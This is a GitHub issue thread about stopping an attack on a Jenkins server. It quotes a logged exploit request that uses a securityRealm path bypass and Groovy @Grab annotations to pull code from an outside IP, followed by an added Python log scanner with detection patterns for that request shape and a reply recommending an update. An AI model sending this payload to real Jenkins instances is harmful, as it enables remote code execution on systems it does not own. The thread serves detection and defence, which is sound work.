Need help: How to prevent from the attack
Closed this issue · 1 comments
p00j4 commented
Observing the attack, apart from blocking the IP, what more can be done to prevent any similar attacks in the future? I'm not using `workflow-cps-plugin`, so I'm wondering how this attack is reaching
"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='FLSOA',root='http://107.170.26.148/')%0a@Grab(group='VSCYG',module='BNTJL',version='1')%0aimport%20KJNME; HTTP/1.1" 499 0 "-" "python-requests/2.18.4"
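For anyone who wants to find out whether the same request shape has hit their own instance, the following is an added example (not code from this issue or from Jenkins) that scans nginx/Apache combined-format access logs for the two things the quoted line shows: a hit on a `descriptorByName/.../checkScriptCompile` endpoint, optionally reached through the `/securityRealm/user/<name>/` prefix, and a `value=` script carrying Grape `@Grab*` annotations. The sample log lines, IP addresses and resolver host below are constructed placeholders; only the URL shape mirrors the request quoted above.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not taken from the issue): the first
# mirrors the request shape quoted above with placeholder IPs/hosts, the second
# is ordinary traffic, the third hits the same endpoint without the
# securityRealm prefix and with the script in a POST body (not logged).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Feb/2019:03:14:01 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='X',root='http://resolver.example/')%0a@Grab(group='a',module='b',version='1')%0aimport%20c; HTTP/1.1" 499 0 "-" "python-requests/2.18.4"
203.0.113.5 - - [10/Feb/2019:03:15:22 +0000] "GET /job/build-app/lastBuild/console HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Feb/2019:03:16:40 +0000] "POST /descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Form-validation endpoints that compile a Groovy script supplied by the caller.
SCRIPT_COMPILE_PATH = re.compile(r'/descriptorByName/[^/]+/checkScript(Compile)?$')
# Grape annotations; @GrabResolver/@GrabConfig in a validation request mean
# the script is trying to pull dependencies from an arbitrary repository.
GRAB_ANNOTATION = re.compile(r'@Grab(Config|Resolver)?\b')


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = unquote(parts.path)
    # Split the query by hand so ';' inside the script is never treated as a separator.
    query = {}
    for param in parts.query.split("&"):
        if not param:
            continue
        key, _, value = param.partition("=")
        query.setdefault(unquote(key), []).append(unquote(value))
    entry["query"] = query
    return entry


def classify(entry):
    """Return the list of reasons a parsed request is suspicious (empty if none)."""
    reasons = []
    if SCRIPT_COMPILE_PATH.search(entry["path"]):
        reasons.append("script_compile_endpoint")
        # Reaching descriptorByName under /securityRealm/user/<name>/ is the
        # path prefix used in the quoted request.
        if entry["path"].startswith("/securityRealm/user/"):
            reasons.append("securityRealm_user_prefix")
    script = "\n".join(entry["query"].get("value", []))
    if GRAB_ANNOTATION.search(script):
        reasons.append("grape_annotation_in_script")
    return reasons


def scan_log(text):
    """Scan log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({
                "ip": entry["ip"], "ts": entry["ts"], "method": entry["method"],
                "status": entry["status"], "path": entry["path"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["method"], f["status"], f["path"], ", ".join(f["reasons"]))
```

Run it against a real access log with `scan_log(open("access.log").read())`. A POST to the endpoint only shows up as `script_compile_endpoint`, because the script travels in the request body, which the access log does not contain; treat that weaker signal as a prompt to check the Jenkins audit trail rather than as proof of an attempt. The HTTP status is kept in each finding on purpose: a 499 like the one in the issue means the client disconnected, so the outcome of the request is unknown from the log alone.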
petercunha commented
To prevent the attack, update to the latest version of Jenkins. They have patched the securityRealm bypass in their latest release.